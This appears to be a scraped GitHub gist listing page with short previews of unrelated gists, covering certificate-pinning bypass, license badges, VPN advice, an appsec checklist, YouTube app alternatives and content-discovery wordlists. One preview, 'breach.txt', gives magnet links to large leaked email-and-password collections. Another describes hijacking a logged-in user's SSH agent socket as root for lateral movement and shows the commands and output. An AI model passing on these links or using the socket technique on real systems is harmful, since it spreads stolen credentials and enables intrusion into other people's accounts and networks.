This is a gist used in the following blog posts:
approovm
/ 00-android-bypass-certificate-pinning-and-mitm-attack-setup.md
Last active
March 8, 2026 22:21
Certificate Pinning Bypassing: Setup with Frida, mitmproxy and Android Emulator with a writable file system
lukas-h
/ license-badges.md
Last active
March 5, 2026 20:18
Markdown License Badges for your Project
Collection of License badges for your Project's README file.
This list includes the most common open source and open data licenses.
Easily copy and paste the code under the badges into your Markdown files.
- The badges do not fully replace the license informations for your projects, they are only emblems for the README, that the user can see the License at first glance.
Translations: (No guarantee that the translations are up-to-date)
No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.
Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.
- A Russian translation of this article can be found here, contributed by Timur Demin.
- A Turkish translation can be found here, contributed by agyild.
- There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.
jhaddix
/ Testing_Checklist.md
Last active
March 3, 2026 23:42
— forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
SkyyySi
/ youtube-vanced-alternatives.md
Last active
February 28, 2026 19:18
A list of alternatives after the shutdown of Vanced
Update 2025-07-16: Use either Revanced, NewPipe or Firefox with add-ons. Revanced is my personal pick, due to it being a mod of the official App like Vanced, but better (e.g. it has integration of Sponsor Block, Return YouTube Disklike and more).
I wouldn't recommend Kiwi Browser anymore as it has been discontinued. AFAIK it has been accuired by Microsoft and the extension support has been merged into Edge (Canary). But you'd have to use Edge. Yuck.
fawazahmed0
/ breach.txt
Last active
February 24, 2026 13:00
Email and password breach collection list
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Please Note, I am sharing this, hoping this will be used for good public use, such as data analysis, penetration testing etc | |
| # These links are already available all over the internet | |
| # Also Note, Trying to login into someone else's account without their permission is unethical and illegal | |
| # Collection 1 | |
| magnet:?xt=urn:btih:B39C603C7E18DB8262067C5926E7D5EA5D20E12E&dn=Collection%201&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce | |
| # Collection 2-5 & Antipublic | |
| magnet:?xt=urn:btih:D136B1ADDE531F38311FBF43FB96FC26DF1A34CD&dn=Collection%20%232-%235%20%26%20Antipublic&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce |
int0x80
/ SSH Agent Forwarding.md
Created
January 7, 2021 00:59
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld
nullenc0de
/ content_discovery_nullenc0de.txt
Last active
February 10, 2026 17:20
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| / | |
| $$$lang-translate.service.js.aspx | |
| $367-Million-Merger-Blocked.html | |
| $defaultnav | |
| ${idfwbonavigation}.xml | |
| $_news.php | |
| $search2 | |
| £º | |
| .0 |
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txtNewerOlder